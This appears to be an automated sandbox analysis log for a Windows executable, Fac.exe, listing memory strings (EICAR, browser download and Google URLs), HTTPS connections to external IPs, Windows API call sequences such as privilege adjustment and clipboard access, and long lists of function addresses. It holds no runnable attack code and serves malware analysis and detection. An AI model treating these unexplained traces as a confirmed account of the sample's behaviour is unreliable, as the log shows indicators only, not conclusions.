Source: Fac.exe, 00000002.00000002.43476613162.0000000034E38000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034DC0000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034F94000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E86000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DA8000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FCA000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: Fac.exe, 00000002.00000003.42462884484.0000000003785000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Fac.exe, 00000002.00000003.42462884484.0000000003785000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
Source: Fac.exe, 00000002.00000002.43476613162.0000000034C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Fac.exe, 00000002.00000002.43476613162.0000000034E6E000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FE2000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=eicar
Source: Fac.exe, 00000002.00000003.42462884484.0000000003785000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Fac.exe, 00000002.00000003.42462884484.0000000003785000.00000004.00000020.00020000.00000000.sdmp, Fac.exe, 00000002.00000003.42462765837.0000000003740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: Fac.exe, 00000002.00000002.43476613162.0000000034DB4000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E7A000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034FD7000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43476613162.0000000034E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Fac.exe, 00000002.00000002.43474377171.0000000033D87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 142.251.41.14:443 -> 192.168.11.20:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.72.97:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49786 version: TLS 1.2

Source: C:\Users\user\Desktop\Fac.exe

Code function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040542B

Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403359
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_00403359

Source: C:\Users\user\Desktop\Fac.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_00404C68	0_2_00404C68
Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_0040698E	0_2_0040698E
Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_70171B63	0_2_70171B63
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00404C68	2_2_00404C68
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_0040698E	2_2_0040698E
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_0015C060	2_2_0015C060
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_0015C330	2_2_0015C330
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00155360	2_2_00155360
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_0015C600	2_2_0015C600
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_0015C8D0	2_2_0015C8D0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_0015E988	2_2_0015E988
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_001569A0	2_2_001569A0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_001529E0	2_2_001529E0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_0015CBA0	2_2_0015CBA0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_0015BBC8	2_2_0015BBC8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00159DE0	2_2_00159DE0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_0015CE70	2_2_0015CE70
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00156FC8	2_2_00156FC8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_0015F95F	2_2_0015F95F
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_0015E978	2_2_0015E978
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00153E09	2_2_00153E09
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C31E80	2_2_36C31E80
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C317A0	2_2_36C317A0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3CCD0	2_2_36C3CCD0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C39548	2_2_36C39548
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3F8D8	2_2_36C3F8D8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C35028	2_2_36C35028
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C32968	2_2_36C32968
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3EEE7	2_2_36C3EEE7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3EEF8	2_2_36C3EEF8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C31E70	2_2_36C31E70
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3178F	2_2_36C3178F
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3CCC0	2_2_36C3CCC0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C39C18	2_2_36C39C18
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C38BA0	2_2_36C38BA0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C30B21	2_2_36C30B21
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C30B30	2_2_36C30B30
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C30040	2_2_36C30040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C35018	2_2_36C35018
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C30021	2_2_36C30021
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBA6E8	2_2_36FBA6E8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB52C8	2_2_36FB52C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBAD40	2_2_36FBAD40
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB2300	2_2_36FB2300
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB15F8	2_2_36FB15F8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB8FF8	2_2_36FB8FF8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBBFF8	2_2_36FBBFF8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB08F0	2_2_36FB08F0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB82F0	2_2_36FB82F0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBE8F7	2_2_36FBE8F7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB75E8	2_2_36FB75E8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBDFE8	2_2_36FBDFE8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB08EF	2_2_36FB08EF
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB08E3	2_2_36FB08E3
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB99E2	2_2_36FB99E2
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB99E0	2_2_36FB99E0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBA6E7	2_2_36FBA6E7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBBFE7	2_2_36FBBFE7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBB6D8	2_2_36FBB6D8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBA6D8	2_2_36FBA6D8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBDFD8	2_2_36FBDFD8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB5FD0	2_2_36FB5FD0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBD6C8	2_2_36FBD6C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB5FCF	2_2_36FB5FCF
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB45C0	2_2_36FB45C0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB5FC0	2_2_36FB5FC0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBB6C7	2_2_36FBB6C7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB52BB	2_2_36FB52BB
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB38B8	2_2_36FB38B8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBF6B8	2_2_36FBF6B8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB45B1	2_2_36FB45B1
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB2BB0	2_2_36FB2BB0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBD6B7	2_2_36FBD6B7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB1EA8	2_2_36FB1EA8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBCDA8	2_2_36FBCDA8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB11A0	2_2_36FB11A0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB8BA0	2_2_36FB8BA0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB2BA0	2_2_36FB2BA0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBF6A7	2_2_36FBF6A7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB0498	2_2_36FB0498
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB7E98	2_2_36FB7E98
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBED98	2_2_36FBED98
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBCD98	2_2_36FBCD98
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBA292	2_2_36FBA292
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB8B91	2_2_36FB8B91
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB7190	2_2_36FB7190
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBA290	2_2_36FBA290
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB1190	2_2_36FB1190
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB048B	2_2_36FB048B
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB9588	2_2_36FB9588
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBC488	2_2_36FBC488
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB7E88	2_2_36FB7E88
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBED88	2_2_36FBED88
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB7180	2_2_36FB7180
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB5B78	2_2_36FB5B78
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBE478	2_2_36FBE478
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBC478	2_2_36FBC478
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB4E70	2_2_36FB4E70
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB5B77	2_2_36FB5B77
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB4168	2_2_36FB4168
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBBB68	2_2_36FBBB68
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBE468	2_2_36FBE468
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB5B6F	2_2_36FB5B6F
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB3460	2_2_36FB3460
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB4E60	2_2_36FB4E60
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB415B	2_2_36FB415B
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB2758	2_2_36FB2758
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBDB58	2_2_36FBDB58
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBBB58	2_2_36FBBB58
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB1A50	2_2_36FB1A50
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB2749	2_2_36FB2749
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB0D48	2_2_36FB0D48
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB8748	2_2_36FB8748
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBB248	2_2_36FBB248
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBFB48	2_2_36FBFB48
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBDB48	2_2_36FBDB48
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB1A41	2_2_36FB1A41
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB0040	2_2_36FB0040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB7A40	2_2_36FB7A40
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB9E38	2_2_36FB9E38
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBD238	2_2_36FBD238
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB0D38	2_2_36FB0D38
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB8738	2_2_36FB8738
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBB238	2_2_36FBB238
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBFB38	2_2_36FBFB38
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBAD31	2_2_36FBAD31
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB7A30	2_2_36FB7A30
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB9E29	2_2_36FB9E29
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBD229	2_2_36FBD229
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB6428	2_2_36FB6428
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBF228	2_2_36FBF228
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB5720	2_2_36FB5720
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB641B	2_2_36FB641B
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBF219	2_2_36FBF219
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB4A18	2_2_36FB4A18
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBC918	2_2_36FBC918
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB571F	2_2_36FB571F
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB001E	2_2_36FB001E
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB3D10	2_2_36FB3D10
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB5710	2_2_36FB5710
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB3008	2_2_36FB3008
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBE908	2_2_36FBE908
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB4A08	2_2_36FB4A08
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FB3D03	2_2_36FB3D03
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FBC907	2_2_36FBC907
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD70C0	2_2_36FD70C0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FDEE38	2_2_36FDEE38
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FDD710	2_2_36FDD710
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD5AE0	2_2_36FD5AE0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD28E0	2_2_36FD28E0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD3EC0	2_2_36FD3EC0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD0CC0	2_2_36FD0CC0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD3EB3	2_2_36FD3EB3
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD54A0	2_2_36FD54A0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD22A0	2_2_36FD22A0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD2290	2_2_36FD2290
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD3880	2_2_36FD3880
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD0680	2_2_36FD0680
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD6A80	2_2_36FD6A80
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD3870	2_2_36FD3870
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD4E60	2_2_36FD4E60
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD1C60	2_2_36FD1C60
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD6440	2_2_36FD6440
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD3240	2_2_36FD3240
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD0040	2_2_36FD0040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD6430	2_2_36FD6430
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD4820	2_2_36FD4820
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD1620	2_2_36FD1620
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD5E00	2_2_36FD5E00
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD2C00	2_2_36FD2C00
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD41E0	2_2_36FD41E0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD0FE0	2_2_36FD0FE0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD0FD0	2_2_36FD0FD0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD57C0	2_2_36FD57C0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD25C0	2_2_36FD25C0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD25B0	2_2_36FD25B0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD6DA0	2_2_36FD6DA0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD3BA0	2_2_36FD3BA0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD09A0	2_2_36FD09A0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD5180	2_2_36FD5180
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD1F80	2_2_36FD1F80
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD6760	2_2_36FD6760
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD3560	2_2_36FD3560
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD0360	2_2_36FD0360
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD9741	2_2_36FD9741
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD4B40	2_2_36FD4B40
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD1940	2_2_36FD1940
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD6120	2_2_36FD6120
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD2F20	2_2_36FD2F20
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD4500	2_2_36FD4500
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FD1300	2_2_36FD1300
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE61E8	2_2_36FE61E8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE2DA8	2_2_36FE2DA8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE1FF8	2_2_36FE1FF8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEB7F8	2_2_36FEB7F8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE48F7	2_2_36FE48F7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE74F7	2_2_36FE74F7
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE0DF0	2_2_36FE0DF0
